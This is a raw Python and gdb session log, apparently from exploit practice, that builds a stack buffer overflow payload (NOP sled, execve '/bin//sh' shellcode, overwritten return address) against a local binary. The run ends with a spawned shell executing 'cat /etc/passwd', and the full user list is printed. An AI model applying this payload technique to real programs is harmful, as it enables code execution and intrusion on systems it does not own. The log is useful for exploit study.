
>>> import random
>>> addr = 0xffffd20c-50-len(sc)-random.randint(0, sublea)
>>> addr
4294944248
>>> a = varcmp2 + b' ' + (b'\x90'*(sublea+4-len(sc)-50)) + sc + (b'\x90'*50) + struct.pack('<I', addr) + b'\n'
>>> 
>>> open('a1.bin','wb').write(varcmp + b'\n' + a + 'cat /etc/passwd')
Traceback (most recent call last):
  File "<stdin>", line 1, in <module>
TypeError: can't concat bytes to str
>>> open('a1.bin','wb').write(varcmp + b'\n' + a + b'cat /etc/passwd\n')
12343

(gdb) run <a1.bin 
Starting program: /home/miser/appr1x.bin <a1.bin
0xffffd20c

Program received signal SIGSEGV, Segmentation fault.
0xffa5f890 in ?? ()
(gdb) x/10i $eip
=> 0xffa5f890:  add    %al,(%eax)
   0xffa5f892:  add    %al,(%eax)
   0xffa5f894:  add    %al,(%eax)
   0xffa5f896:  add    %al,(%eax)
   0xffa5f898:  add    %al,(%eax)
   0xffa5f89a:  add    %al,(%eax)
   0xffa5f89c:  add    %al,(%eax)
   0xffa5f89e:  add    %al,(%eax)
   0xffa5f8a0:  add    %al,(%eax)
   0xffa5f8a2:  add    %al,(%eax)
(gdb) x/20wx 0xffffd20c
0xffffd20c:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd21c:     0xffa5f890      0x71000aff      0x6a766370      0x65696973
0xffffd22c:     0x786a7770      0x656e6166      0x6c727868      0x62776968
0xffffd23c:     0x67666361      0x00000000      0x00000000      0x00000000
0xffffd24c:     0x00000000      0x00000000      0x00000000      0x00000000

(gdb) i r esp
esp            0xffffd220       0xffffd220
(gdb) x/10wx 0xffffd220
0xffffd220:     0x71000aff      0x6a766370      0x65696973      0x786a7770
0xffffd230:     0x656e6166      0x6c727868      0x62776968      0x67666361
0xffffd240:     0x00000000      0x00000000

(gdb) x/10wx 0xffffd220-0x20
0xffffd200:     0x90909090      0x90909090      0x90909090      0x90909090
0xffffd210:     0x90909090      0x90909090      0x90909090      0xffa5f890
0xffffd220:     0x71000aff      0x6a766370

(gdb) x/40i 0xffffd220-0x40
   0xffffd1e0:  outsb  %ds:(%esi),(%dx)
   0xffffd1e1:  mov    %esp,%ebx
   0xffffd1e3:  push   %eax
   0xffffd1e4:  push   %ebx
   0xffffd1e5:  mov    %esp,%ecx
   0xffffd1e7:  mov    $0xb,%al
   0xffffd1e9:  int    $0x80
   0xffffd1eb:  nop
   0xffffd1ec:  nop
   0xffffd1ed:  nop
   0xffffd1ee:  nop
   0xffffd1ef:  nop


gdb ./appr1x.bin 
GNU gdb (Gentoo 7.11.1 vanilla) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://bugs.gentoo.org/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./appr1x.bin...(no debugging symbols found)...done.
(gdb) run <a1.bin 
Starting program: /home/miser/appr1x.bin <a1.bin
0xffffd20c

Program received signal SIGSEGV, Segmentation fault.
0xffffd1d4 in ?? ()
(gdb) x/10i $eip
=> 0xffffd1d4:  rclb   $0x2f,0x68(%eax)
   0xffffd1d8:  das    
   0xffffd1d9:  jae    0xffffd243
   0xffffd1db:  push   $0x6e69622f
   0xffffd1e0:  mov    %esp,%ebx
   0xffffd1e2:  push   %eax
   0xffffd1e3:  push   %ebx
   0xffffd1e4:  mov    %esp,%ecx
   0xffffd1e6:  mov    $0xb,%al
   0xffffd1e8:  int    $0x80
(gdb) x/10i $eip+1
   0xffffd1d5:  push   %eax
   0xffffd1d6:  push   $0x68732f2f
   0xffffd1db:  push   $0x6e69622f
   0xffffd1e0:  mov    %esp,%ebx
   0xffffd1e2:  push   %eax
   0xffffd1e3:  push   %ebx
   0xffffd1e4:  mov    %esp,%ecx
   0xffffd1e6:  mov    $0xb,%al
   0xffffd1e8:  int    $0x80
   0xffffd1ea:  nop
(gdb) x/10i $eip-1
   0xffffd1d3:  xor    %eax,%eax
   0xffffd1d5:  push   %eax
   0xffffd1d6:  push   $0x68732f2f
   0xffffd1db:  push   $0x6e69622f
   0xffffd1e0:  mov    %esp,%ebx
   0xffffd1e2:  push   %eax
   0xffffd1e3:  push   %ebx
   0xffffd1e4:  mov    %esp,%ecx
   0xffffd1e6:  mov    $0xb,%al
   0xffffd1e8:  int    $0x80
(gdb) quit


>>> addr = 0xffffd1d0
>>> a = varcmp2 + b' ' + (b'\x90'*(sublea+4-len(sc)-50-1)) + sc + (b'\x90'*50) + struct.pack('<I', addr) + b'\n'
>>> open('a1.bin','wb').write(varcmp + b'\n' + a + b'cat /etc/passwd\n')
12342
>>> 
[1]+  Stopped                 python3
miser@snowden ~ $ gdb ./appr1x.bin 
GNU gdb (Gentoo 7.11.1 vanilla) 7.11.1
Copyright (C) 2016 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-pc-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<https://bugs.gentoo.org/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./appr1x.bin...(no debugging symbols found)...done.
(gdb) run <a1.bin 
Starting program: /home/miser/appr1x.bin <a1.bin
0xffffd20c
process 9518 is executing new program: /bin/bash
warning: Could not load shared library symbols for linux-vdso.so.1.
Do you need "set solib-search-path" or "set sysroot"?
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/bin/false
daemon:x:2:2:daemon:/sbin:/bin/false
adm:x:3:4:adm:/var/adm:/bin/false
lp:x:4:7:lp:/var/spool/lpd:/bin/false
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
news:x:9:13:news:/var/spool/news:/bin/false
uucp:x:10:14:uucp:/var/spool/uucp:/bin/false
operator:x:11:0:operator:/root:/bin/bash
portage:!x:250:250:portage:/var/tmp/portage:/bin/false
nobody:x:65534:65534:nobody:/var/empty:/bin/false
sshd:x:22:22:added by portage for openssh:/var/empty:/sbin/nologin
man:x:13:15:added by portage for man-db:/usr/share/man:/sbin/nologin
cron:x:16:16:added by portage for cronbase:/var/spool/cron:/sbin/nologin
jvoss:x:1000:1000::/home/jvoss:/bin/bash
ldap:x:439:439:added by portage for openldap:/usr/lib64/openldap:/sbin/nologin
mail:x:8:12:added by portage for mailbase:/var/spool/mail:/sbin/nologin
postmaster:x:14:246:added by portage for mailbase:/var/spool/mail:/sbin/nologin
nullmail:x:88:88:added by portage for nullmailer:/var/nullmailer:/sbin/nologin
messagebus:x:101:245:added by portage for dbus:/dev/null:/sbin/nologin
polkitd:x:102:104:added by portage for polkit:/var/lib/polkit-1:/sbin/nologin
dhcp:x:103:103:added by portage for dhcp:/var/lib/dhcp:/sbin/nologin
sddm:x:104:102:added by portage for sddm:/var/lib/sddm:/sbin/nologin
game:x:1001:1001::/home/game:/bin/bash
tcpdump:x:105:101:added by portage for tcpdump:/dev/null:/sbin/nologin
apache:x:81:81:added by portage for apache:/var/www:/sbin/nologin
mysql:x:60:60:added by portage for mariadb:/dev/null:/sbin/nologin
pcscd:x:106:998:added by portage for pcsc-lite:/run/pcscd:/sbin/nologin
festival:x:107:18:added by portage for festival:/dev/null:/sbin/nologin
deluge:x:108:997:added by portage for deluge:/var/lib/deluge:/sbin/nologin
javantea:x:1002:1002::/home/javantea:/bin/bash
miser:x:1003:1003::/home/miser:/bin/bash
games:x:36:35:added by portage for games-envd:/usr/games:/bin/bash
fractal:x:1004:1005::/home/fractal:/bin/bash
rain:x:1005:1006::/home/rain:/bin/bash
dnscache:x:109:200:added by portage for djbdns:/dev/null:/sbin/nologin
dnslog:x:110:200:added by portage for djbdns:/dev/null:/sbin/nologin
tinydns:x:111:200:added by portage for djbdns:/dev/null:/sbin/nologin
[Inferior 1 (process 9518) exited normally]
(gdb) quit
